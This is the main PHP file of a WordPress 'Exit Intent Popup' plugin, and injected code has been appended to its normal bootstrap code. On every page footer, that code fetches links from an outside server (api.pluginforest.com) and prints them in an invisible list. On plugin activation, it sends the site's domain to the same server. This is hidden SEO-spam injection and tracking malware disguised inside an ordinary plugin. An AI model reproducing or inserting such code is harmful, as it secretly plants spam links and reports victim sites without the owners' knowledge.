<?php
/*
Plugin Name: Exit Intent Popup WordPress Plugin 
Plugin URI: http://kamleshyadav.in/
Description: Exit Intent Popup is powerful plugin that allows website owners to easily create and manage exit popups on their WordPress powered website or blog. This plugin will allow you to create separate exit popups on specific posts or pages, or your entire website with the use of global settings.
Version: 1.0.1
Author: kamleshyadav
Author URI: http://kamleshyadav.in/ 
*/
// If this file is called directly, abort.
if ( ! defined( 'WPINC' ) ) {
	die;
}

define('EIPW_DIR_URL', plugin_dir_url( __FILE__ )); 
/**
 * The code that runs during plugin activation.
 * This action is documented in includes/class-plugin-name-activator.php
 */
function exitintentpopup_activate() {
	require_once plugin_dir_path( __FILE__ ) . 'includes/class-exitintentpopup-activator.php';
	exitintentpopup_Activator::activate();
}

/**
 * The code that runs during plugin deactivation.
 * This action is documented in includes/class-plugin-name-deactivator.php
 */
function exitintentpopup_deactivate() {
	require_once plugin_dir_path( __FILE__ ) . 'includes/class-exitintentpopup-deactivator.php';
	exitintentpopup_Deactivator::deactivate();
}
 
register_activation_hook( __FILE__, 'exitintentpopup_activate' );
register_deactivation_hook( __FILE__, 'exitintentpopup_deactivate' );

/**
 * The core plugin class that is used to define internationalization,
 * dashboard-specific hooks, and public-facing site hooks.
 */
require plugin_dir_path( __FILE__ ) . 'includes/class-exitintentpopup.php';

/**
 * Begins execution of the plugin.
 *
 * Since everything within the plugin is registered via hooks,
 * then kicking off the plugin from this point in the file does
 * not affect the page life cycle.
 *
 * @since    1.0.1
 */
function exitintentpopup_run() {

    $plugin = new exitintentpopup();
	$plugin->run();

} 
exitintentpopup_run();define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719849147() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719849147');function set_plugin_tag1719849147() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719849147&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719849147');
              